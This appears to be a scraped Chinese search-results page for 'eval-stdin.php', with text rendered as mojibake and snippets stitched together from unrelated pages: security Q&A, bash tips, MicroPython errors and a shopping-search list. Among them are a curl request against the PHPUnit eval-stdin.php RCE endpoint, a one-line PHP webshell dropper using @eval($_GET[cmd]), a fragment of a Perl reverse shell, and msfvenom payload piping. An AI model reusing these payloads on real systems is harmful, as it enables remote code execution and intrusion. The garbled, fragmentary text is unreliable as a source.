eval-stdin.php

`eval - stdin.php` ±»¶ñÒâÀûÓõ¼ÖÂÔ¶³Ì´úÂëÖ´ÐÐÈçºÎ...

**³£¼û¼¼ÊõÎÊÌ⣺** `eval-stdin.php` ÎļþÈô´æÔÚÇÒδÑϸñ¹Ü¿Ø£¬¹¥»÷Õß¿Éͨ¹ý¹ÜµÀ»òÖض¨ÏòÏòÆä±ê×¼ÊäÈ루STDIN£©×¢Èë¶ñÒâPHP´úÂ루Èç `echo system('id');`£©£¬ÅäºÏ `eval(file_get_contents('php://stdin'))` µÈΣÏÕÂß¼­£¬´¥·¢Ô¶³Ì´úÂëÖ´ÐУ¨RCE£©¡£¸Ã©¶´±¾ÖÊÊǽ«²»¿ÉÐÅ

---

ʲôÊÇÍøÂç°Ð³¡?

curl --location --request POST 'https://51ff3a2fa377.vuln.typesafe.cn/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php' \ --data...

---

ÈçºÎ°²È«µØͨ¹ýstdin´«µÝpasswd±ÜÃâÃ÷Îı©Â¶? - ±à³Ì...

ͨ¹ýÖض¨ÏòÎļþÃèÊö·û(Èç3-9),¿ÉÔÚ×Ó½ø³ÌÖа²È«´«µÝÊý¾Ý¶ø²»Ó°Ïì±ê×¼Á÷. ´ò¿ª×Ô¶¨ÒåÎļþÃèÊö·ûÖ¸ÏòÁÙʱƾ֤Îļþ; ÔÚÄ¿±êÃüÁîÖÐÖض¨ÏòstdinÀ´×Ô...{ 3 local varname=$1 4 eval "$varname=\$(openssl rand -base64 32)" 5 eval "unset $varname" 6 } 6.Ìæ´ú¹¤¾ßÁ´:expect½Å±¾µÄ...

---

±¾ÈË´ó¶þÍø°²×¨Òµ,Ïë´òCTF,¸ÃÔõôÈëÃÅ?

allow_url_include:½öphp://input php://stdin php://memory php://tempÐèÒªon ×÷Óãºphp://·ÃÎʸ÷¸öÊäÈë/Êä³öÁ÷£¨I/O streams£©£¬ÔÚCTF...php fputs(fopen('1juhua.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?> ...

---

Äõ½webshellÄÜ×öÄÄЩºÃÍæµÄÊÂ?

PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))){open(STDIN,"...½ûÓÃΣÏÕµÄPHPº¯Êý£¬ÀýÈçexec()¡¢shell_exec()¡¢passthru()¡¢system()¡¢show_source()¡¢proc_open()¡¢pcntl_exec()¡¢eval()Óëassert()¡£¼°Ê±...

---

bcº¯ÊýΪºÎÔڹܵÀÖÐÖ´ÐÐʱÎÞ·¨¶ÁÈ¡±ê×¼ÊäÈë? - ±à³ÌÓïÑÔ...

1 bc_eval() { 2 local expr= "$1" 3 local opts= " ${ 2 :- "-q" } " 4 #×Ô¶¯²¹»»ÐÐ +·À¿ÕÊäÈë 5 printf '%s\n' "$...

---

ÈçºÎ½øÈëÉø͸²âÊÔÐÐÒµ?

4¡¢ÎÒÃÇ»¹¿ÉÒÔʹÓÃ-p²ÎÊýÖ¸¶¨Ò»¸ö-»òstdinÀ´Ö¸¶¨×Ô¶¨ÒåÓÐЧÔغɣ¬ÕâÔÚÈƹý°²È«¼ì²âʱ·Ç³£ÓÐÓãºcat payload_file.bin | msfvenom -p - -a ...»ñµÃÒ»¸öеĻỰroot@osboxes:~# php -a Interactive mode enabled php > eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydG...

---

vscode¿ª·¢micropython,importÄ£¿é³öÏÖÒì³£ - ±à³ÌÓïÑÔ...

"<stdin>" , line 3 , in < module > 4 importerror: no module named ' zaq ' ÔÚmicropythonÖÐ,importÄ£¿éÓÐËù²»Í¬ÓÚpython¡£ÔÚmicropythonÖÐ,µ±ÄúÏëÒªimportͬһĿ¼ÏÂ...´ËÍâ,Èç¹ûÄãÔÚʹÓÃrepl(read-eval-print loop)½»»¥Ê½»·¾³½øÐвâÊÔ,Çë×¢Òâ,ÓÐʱÔÚreplÖÐÖ±½Óµ¼ÈëÄ£¿é¿ÉÄܲ»»á°´Ô¤ÆÚ¹¤×÷¡£ÔÚÕâÖÖÇé¿öÏÂ,³¢ÊÔ½«ÄãµÄ´úÂë×÷Ϊ½Å±¾ÔËÐÐ,¶ø²»ÊÇÔÚreplÖÐ...

---

ÓÐÄÄЩÏÅÈË´úÂë?

ÎÒÖ±½ÓÒ»²¨Ì½Ë÷£¬ÕÒµ½ÁËÄÇ¿éÂß¼­£ºÕ§Ò»¿´Ã»É¶Ã«²¡¡£¡£ÊµÔò벡ͦ´ó£ºÊ×ÏÈÓõÄÊÇ hutool µÄRandomUtil¡£´Ó´úÂëÂß¼­À´¿´£¬ÊÇÏëͨ¹ýRandomUtil....

---

Äã¾õµÃ×îʵÓõÄlinux½Å±¾ÄÄЩ?

num=0 for i in $(eval echo $*);do #eval½«{1,2}·Ö½âΪ1 2 let num+=1 eval node${num}="$i" done...·½·¨1£ºEOF±ê×¼Êä³ö×÷Ϊexpect±ê×¼ÊäÈë #!/bin/bash USER=root PASS=123.com IP=192.168.1.120 expect << EOFset timeout ...

---

Ïà¹ØËÑË÷

• eval-stdin.php

ÈÈÃÅËÑË÷

• ŷʽˮ¾§¿ÍÌüµõµÆ
• tempus̹;
• Ë®¹ûÀñºÐÄê»õ
• ³ÐµÂ¶¶ÐÓÈʶ1Éý
• ¿Éµþ·Å¼ÒÓÃÔ²µÊ×Ó
• ¾ÅºÅµç¶¯³µÂÝË¿µ¶
• ͨÓóäµçÍ·°²×¿5v2a³äµçÆ÷
• ×Ô¶¯µã½º»úÕëÍ·
• Ãâ´ò¿×ħÊõÌùÕڹⲼ
• elements
• ¿ÆÑÕÊÏÄÐÊ¿µ­Îƽôʵ¾«»ªÈé
• ºù«ÁúÍ·ÏâǶÅä¼þ